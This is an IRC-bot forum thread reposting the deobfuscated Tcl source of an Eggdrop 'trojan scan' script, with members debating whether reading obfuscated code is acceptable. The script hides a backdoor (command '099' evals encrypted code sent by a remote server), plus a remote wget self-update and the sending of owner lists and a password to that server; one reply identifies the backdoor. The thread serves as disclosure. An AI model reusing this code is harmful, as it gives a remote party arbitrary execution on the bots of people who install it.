This is the new home of the egghelp.org community forum.
All data has been migrated (including user logins/passwords) to a new phpBB version.


For more information, see this announcement post. Click the X in the top right-corner of this box to dismiss this message.

encrypted trojan scan script (cont.)

Support & discussion of released scripts, and announcements of new releases.
User avatar
^DooM^
Owner
Posts: 772
Joined: Tue Aug 26, 2003 5:40 pm
Location: IronForge
Contact:

encrypted trojan scan script (cont.)

Post by ^DooM^ »

Due to the previous thread being screwed up by the long encrypted text line i have reposted Sir_Fz' unencrypted script post here.
Sir_fz wrote:

Code: Select all

      # -- flags

        setudef flag aspbgbl
        setudef flag aspbwarn

      # -- strings

        setudef str aspbkickmsg

        setudef str detected
        setudef str joins
        setudef str kicked

      # -- bindings

        # - remove me

          bind MSG -|- "REMOVEME" aspbgbl:remove:user

        # - check for possible trojans onjoin

          bind JOIN -|- "*" aspbgbl:check:user

        # - update channels

          bind PART -|- "*" aspbgbl:update:channels

        # - update botname

          bind NICK -|- "*" aspbgbl:update:nickname

        # - script status

          bind PUB nm|nm "$::aspb(trigger)" aspbgbl:status

        # - auto update

          bind TIME -|- "00 * * * *" aspbgbl:update

    # --- script main source - NEVER TOUCH IT ;)

      # -- auto update aspbgbl

        proc aspbgbl:update { minute hour day month year } {

          if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
            return
          }

          putdcc $idx "cmd=011 $::aspb(version)"

        }

      # -- trojan scan control panel

        proc aspbgbl:status { nickname hostname handle channel arguments } {

          global lastbind

          if {[channel get $channel "aspbkickmsg"] == ""} {
            channel set $channel aspbkickmsg $::aspb(default)
          }

          switch -exact -- [string tolower [lindex [split $arguments] 0]] {

            "warn" {

              set status "Bot will warn users."

              if {![channel get $channel "aspbwarn"]} {
                set status "Bot won't warn users."
              }

              switch -exact -- [string tolower [lindex [split $arguments] 1]] {

                "on" {
                  putserv "NOTICE $nickname :Successfully turned on"; channel set $channel +aspbwarn
                }

                "off" {
                  putserv "NOTICE $nickname :Successfully turned off"; channel set $channel -aspbwarn
                }

                "default" {
                  putserv "NOTICE $nickname :$status Please use: $lastbind \037warn\037 \037on\037|\037off\037"
                }

              }           

            }

            "stats" {

              if {![regexp {[0-9]{1,}} [channel get $channel "joins"]] || ![regexp {[0-9]{1,}} [channel get $channel "detected"]] || ![regexp {[0-9]{1,}} [channel get $channel "kicked"]] || ![channel get $channel "aspbgbl"]} {
                putserv "NOTICE $nickname :No statistic available :("; return
              }

              putserv "NOTICE $nickname :\037Joins:\037 [channel get $channel "joins"] \037Detected Clients:\037 [channel get $channel "detected"] \037Kicked Clients:\037 [channel get $channel "kicked"]"

            }

            "status" {

              set status "aspb is enabled."

              if {![channel get $channel "aspbgbl"]} {
                set status "aspb is disabled."
              }

              switch -exact -- [string tolower [lindex [split $arguments] 1]] {

                "on" {
                  putserv "NOTICE $nickname :Successfully turned on."; putserv "PRIVMSG $channel :\001ACTION aspb ver. $::aspb(version) by $::aspb(author)\001"; channel set $channel +aspbgbl
                }

                "off" {
                  putserv "NOTICE $nickname :Successfully turned off."; channel set $channel -aspbgbl
                }

                "default" {
                  putserv "NOTICE $nickname :$status Please use: $lastbind \037status\037 \037on\037|\037off\037"; return
                }

              }

              if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
                return
              }

              set enabled ""
 
              foreach chan [channels] {

                if {![channel get $chan "aspbgbl"]} {
                  lappend enabled $chan
                } else {
                  lappend enabled +$chan
                }
         
              }

              putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"

            }

            "kickmsg" {

              if {[join [lrange [split $arguments] 1 end]] == ""} {


                if {[channel get $channel "aspbkickmsg"] == ""} {
                  set kickmessage "not set"
                } else {
                  set kickmessage [channel get $channel "aspbkickmsg"]
                }

                putserv "NOTICE $nickname :Kickmessage: [join $kickmessage]"
                putserv "NOTICE $nickname :Please use: $lastbind \037kickmsg\037 \037message\037 (Available options: %1\$s = hostname, %2\$s = botnick, %3\$s = trojan id, %4\$s = detected counter, %5\$s = trojan type)"

                return

              }

              channel set $channel aspbkickmsg [join [lrange [split $arguments] 1 end]]

              putserv "NOTICE $nickname :Kickmessage successfully saved."

            }

            "default" {

              set status "aspb is enabled."

              if {![channel get $channel "aspbgbl"]} {
                set status "aspb is disabled."
              }

              putserv "NOTICE $nickname :$status Please use: $lastbind \037warn\037|\037status\037|\037stats\037|\037kickmsg\037 \037?arguments?\037"

            }

          }

        }

      # -- get command/result from the database

        proc aspbgbl:database { idx arguments } {

          if {![valididx $idx]} {
            return
          }

          foreach argument $arguments {

            if {[regexp -- {^(.+?)=(.+?)$} $argument -> variable value]} {
              set $variable $value
            }

          }

          if {![info exists cmd]} {
            return
          }

          if {$cmd == "004"} {

            if {![info exists type]} {
              set type ""
            }

            channel set $chan detected [expr [channel get $chan "detected"] + 1]
            channel set $chan kicked [expr [channel get $chan "kicked"] + 1]

            if {![info exists reason] || [llength $reason] < 1} {
              set reason [format [join [channel get $chan "aspbkickmsg"]] [lindex [split $mask "@"] 1] $::botnick $id [channel get $chan "detected"] $type]; set warn 1
            } else {
              regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason; set warn 0
            }

            set unban ""

            foreach chanban [chanbans $chan] {

              if {[lindex $chanban 2] >= 300} {
                lappend unban [lindex $chanban 0]
              }

              if {[llength $unban] == "6"} {
                putquick "MODE $chan -[string repeat "b" [llength $unban]] [join $unban]"; set unban ""
              }

            }

            if {$unban == "" && [llength [chanbans $chan]] == "45"} {

              set banid 0

              while {$banid < 5} {
                lappend unban [lindex [lindex [chanbans $chan] $banid] 0]; incr banid 1
              }

            }

            putquick "KICK $chan $nick :$reason" -next
            putquick "MODE $chan -[string repeat "b" [llength $unban]]+b [join $unban] $mask"

            if {[channel get $chan "aspbwarn"] && $warn} {
              putserv "NOTICE $nick :You are known as possible ${type}-trojan infected drone. If you wish to remove yourself, please type in: /msg $::botnick removeme"
              putserv "NOTICE $nick :More Information can be found at: \037[format www.pjen.net/?id=%d&botnick=%s $id $::botnick]\037"
            }

          } elseif {$cmd == "099"} {
            regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] }
          } elseif {$cmd == "013"} {

            if {![validchan $chan]} {
              return
            }

            channel set $chan -aspbgbl

            if {![info exists reason]} {
              set reason "not given"
            } else {
              regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason
            }

            putserv "PRIVMSG $chan :\001ACTION cries, aspb turned off for this channel. (reason: $reason)\001"

          } elseif {$cmd == "010"} {

            if {![info exists reason]} {
              set reason "not given"
            } else {
              regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason
            }

            foreach chan [channels] {

              if {![channel get $chan "aspbgbl"]} {
                continue
              }

              channel set $chan -aspbgbl

              putserv "PRIVMSG $chan :\001ACTION cries, aspb turned off for this channel. (reason: $reason)\001"

            }

          } elseif {$cmd == "012"} {

            if {[catch { exec wget $url } result]} {

              if {![info exists changes]} {
                set changes "not given"
              } else {
                regexp -nocase -- {^.+ message=(.+?)$} $arguments -> changes
              }

              if {[regexp -- {^.+\`(.+?)\'.+$} $result -> filename]} {

                if {[file exists $::aspb(path)]} {
                  file delete -force $::aspb(path)
                }

                file rename -force $filename $::aspb(path)

                if {[file exists $filename]} {
                  file delete -force $filename
                }

                set owners ""

                foreach owner [userlist n] {

                  if {[hand2nick $owner] != ""} {
                    lappend owners [hand2nick $owner]
                  }

                }

                if {[llength $owners] > 0} {
                  putserv "PRIVMSG [join $owners ","] :Your aspbgbl version has been updated. (Changes: $changes)"
                }

                if {[array exists ::aspb]} {
                  array unset ::aspb
                }

                catch { killdcc $idx }

                rehash

              }

              return

            }

            putlog "aspbgbl\002:\002 There is a new aspbgbl version available."

          } elseif {$cmd == "009"} {

            if {!$status} {
              puthelp "NOTICE $nick :Your hostname '$mask' isn't known in the database.";return
            }

            puthelp "NOTICE $nick :Your hostname '$mask' has been successfully removed."

            set unbanned ""

            foreach channel [channels] {

              if {[channel get $channel "aspbgbl"]} {

                foreach channelban [chanbans $channel] {

                  if {[string match -nocase [lindex [split $channelban] 0] $mask]} {
                    lappend unbanned $channel; pushmode $channel -b [lindex [split $channelban] 0]
                  }

                }

              }

            }

            if {[llength $unbanned] > 0} {
              puthelp "NOTICE $nick :Feel free to rejoin the following [expr {([llength $unbanned] == 1) ? "channel" : "channels" }] [join $unbanned ", "]"
            }

          } elseif {$cmd == "014"} {

            regexp -nocase -- {^.+ message=(.+?)$} $arguments -> message

            if {![info exists message]} {
              return
            }

            set list ""

            foreach owner [userlist n] {

              if {[set nick [hand2nick $owner]] != ""} {
                lappend list $nick
              }

            }

            putserv "PRIVMSG [join $list ","] :$message"

          } elseif {$cmd == "015"} {

            regexp -nocase -- {^.+ message=(.+?)$} $arguments -> message

            if {![info exists message]} {
              return
            }

            set list ""

            foreach channel [channels] {

              if {[channel get $channel "aspbgbl"]} {
                lappend list $channel
              }

            }

            putserv "PRIVMSG [join $list ","] :\001ACTION attention, aspb broadcast: $message\001"

          }

        }

      # -- remove a possible user

        proc aspbgbl:remove:user { nickname hostname handle arguments } {

          if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
            return
          }

          putdcc $idx "cmd=008 $nickname!$hostname"

        }

      # -- update database information

        proc aspbgbl:update:channels { nickname hostname handle channel reason } {

          if {[isbotnick $nickname]} {

            if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
              return
            }

            set enabled ""
 
            foreach chan [channels] {

              if {[string equal -nocase $chan $channel]} {
                continue
              }

              if {![channel get $chan "aspbgbl"]} {
                lappend enabled $chan
              } else {
                lappend enabled +$chan
              }
         
            }

            putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"

          }

        }

      # -- update botname information

        proc aspbgbl:update:nickname { nickname hostname handle channel newnick } {

          global nospam

          if {[isbotnick $nickname] && ![string equal -nocase $nickname $newnick]} {

            if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
              return
            } elseif {[info exists nospam] && [expr [unixtime] - $nospam] < 5} {
              return
            }

            set enabled ""
 
            foreach chan [channels] {

              if {![channel get $chan "aspbgbl"]} {
                lappend enabled $chan
              } else {
                lappend enabled +$chan
              }
         
            }

            putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
            set nospam [unixtime]

          }

        }

      # -- check for possible trojan on join

        proc aspbgbl:check:user { nickname hostname handle channel } {

          if {[isbotnick $nickname]} {

            if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
              return
            }

            set enabled ""
 
            foreach chan [channels] {

              if {![channel get $chan "aspbgbl"]} {
                lappend enabled $chan
              } else {
                lappend enabled +$chan
              }
         
            }

            putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
            return

          }

          channel set $channel joins [expr [channel get $channel "joins"] + 1]

          if {[string match "*quakenet.org" $hostname]} {
            return
          } elseif {[matchattr $handle mno|mno $channel]} {
            return
          } elseif {![botisop $channel]} {
            return
          } elseif {[regexp -- {i|k|r} [lindex [getchanmode $channel] 0]]} {
            return
          } elseif {![channel get $channel "aspbgbl"]} {
            return
          } elseif {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
            return
          } elseif {[isbotnick $nickname]} {
            return
          }

          if {[channel get $channel "aspbkickmsg"] == ""} {
            channel set $channel aspbkickmsg $::aspb(default)
          }

          set idler    0
          set operator 0
          set voice    0

          foreach user [chanlist $channel] {

            if {[isop $user $channel]} {
              incr operator 1
            } elseif {[isvoice $user $channel]} {
              incr voice 1
            }

            incr idler 1

          }

          putdcc $idx "cmd=003 $nickname!$hostname $channel $idler $operator $voice"

        }

      # -- get idx for the aspbgbl database

        proc aspbgbl:connection { address } {

          foreach socket [dcclist] {

            if {[string equal -nocase $address [lindex [split $socket] 2]]} {
              return [lindex [split $socket] 0]
            }

          }

          if {![valididx [set idx [connect $::aspb(address) $::aspb(port)]]]} {
            return -1
          }

          set enabled ""

          foreach channel [channels] {

            if {![channel get $channel "aspbgbl"]} {
              lappend enabled $channel
            } else {
              lappend enabled +$channel
            }
         
          }

          putdcc $idx "cmd=001 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
          control $idx aspbgbl:database

          return $idx

        }
The lifecycle of a noob is complex. Fledgling noobs gestate inside biometric pods. Once a budding noob has matured thru gestation they climb out of their pod, sit down at a PC, ask a bunch of questions that are clearly in the FAQ, The Noob is born
User avatar
Sir_Fz
Revered One
Posts: 3793
Joined: Sun Apr 27, 2003 3:10 pm
Location: Lebanon
Contact:

Post by Sir_Fz »

Good idea, my post is realy ugly :lol:
User avatar
Alchera
Revered One
Posts: 3344
Joined: Mon Aug 11, 2003 12:42 pm
Location: Ballarat Victoria, Australia
Contact:

Post by Alchera »

So I didn't need new glasses after all? Yay! :lol:
Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM
User avatar
^DooM^
Owner
Posts: 772
Joined: Tue Aug 26, 2003 5:40 pm
Location: IronForge
Contact:

Post by ^DooM^ »

Haha it took me a while to find the post it just looked like therewas nothing till I scrolled over and down. Just doing my good deed for the day :wink:
The lifecycle of a noob is complex. Fledgling noobs gestate inside biometric pods. Once a budding noob has matured thru gestation they climb out of their pod, sit down at a PC, ask a bunch of questions that are clearly in the FAQ, The Noob is born
User avatar
Thunderdome
Op
Posts: 187
Joined: Tue Mar 15, 2005 4:42 pm

Post by Thunderdome »

How does this script work? I tried to read the code, but I don't understand what it does...
User avatar
ex
Voice
Posts: 14
Joined: Wed May 18, 2005 11:04 pm
Location: Chicago

Post by ex »

it connects to a bot and on every join it asks whether it is a spamclient or not.

+ some additional features.
m
metroid
Owner
Posts: 771
Joined: Wed Jun 16, 2004 2:46 am

Post by metroid »

Guys, i just happen to know who made this script and code get obfuscated for a reason. You shouldn't deobfuscate code for someone without the explicit authorisation from the author, unless there would be malious code in it, which i dont think there is..
g
greenbear
Owner
Posts: 733
Joined: Mon Sep 24, 2001 8:00 pm
Location: Norway

Post by greenbear »

thats just bullshit. its distributed freely under the gnu licence. if he didnt want ppl to read it, he shouldnt have made it public.
User avatar
Sir_Fz
Revered One
Posts: 3793
Joined: Sun Apr 27, 2003 3:10 pm
Location: Lebanon
Contact:

Post by Sir_Fz »

Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably noone has tried to look through it)

Besides, it's decrypting, the code is still the same.
User avatar
^DooM^
Owner
Posts: 772
Joined: Tue Aug 26, 2003 5:40 pm
Location: IronForge
Contact:

Post by ^DooM^ »

Sir_Fz wrote:Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably noone has tried to look through it)

Besides, it's decrypting, the code is still the same.
Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not of released it to the public.
The lifecycle of a noob is complex. Fledgling noobs gestate inside biometric pods. Once a budding noob has matured thru gestation they climb out of their pod, sit down at a PC, ask a bunch of questions that are clearly in the FAQ, The Noob is born
User avatar
Alchera
Revered One
Posts: 3344
Joined: Mon Aug 11, 2003 12:42 pm
Location: Ballarat Victoria, Australia
Contact:

Post by Alchera »

I thought only Vulcans used logic? :D :lol:

Bravo one and all.
Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM
User avatar
Sir_Fz
Revered One
Posts: 3793
Joined: Sun Apr 27, 2003 3:10 pm
Location: Lebanon
Contact:

Post by Sir_Fz »

I forgot to mention, that code was encrypted like 4 times :P lol, Everytime I decrypted it, it showed me yet another encryption (was about to give up on it :P ) maybe next time he should try encrypting it endlessly :lol:
G
Galadhrim
Op
Posts: 123
Joined: Fri Apr 11, 2003 8:38 am
Location: Netherlands, Enschede

Post by Galadhrim »

maybe make a better decrypter that uses recursiveness.
User avatar
De Kus
Revered One
Posts: 1361
Joined: Sun Dec 15, 2002 11:41 am
Location: Germany

Post by De Kus »

^DooM^ wrote:Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not of released it to the public.
Since he distributed it under the GNU GPL it would be even illegal to make the source code unaccessable.
De Kus
StarZ|De_Kus, De_Kus or DeKus on IRC
Copyright © 2005-2009 by De Kus - published under The MIT License
Love hurts, love strengthens...
A
Arie
Voice
Posts: 1
Joined: Mon Jul 18, 2005 10:28 am

Post by Arie »

the part:

Code: Select all

 } elseif {$cmd == "099"} {
            regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] } 
was a backdoor i heard - dont know tcl =p
Post Reply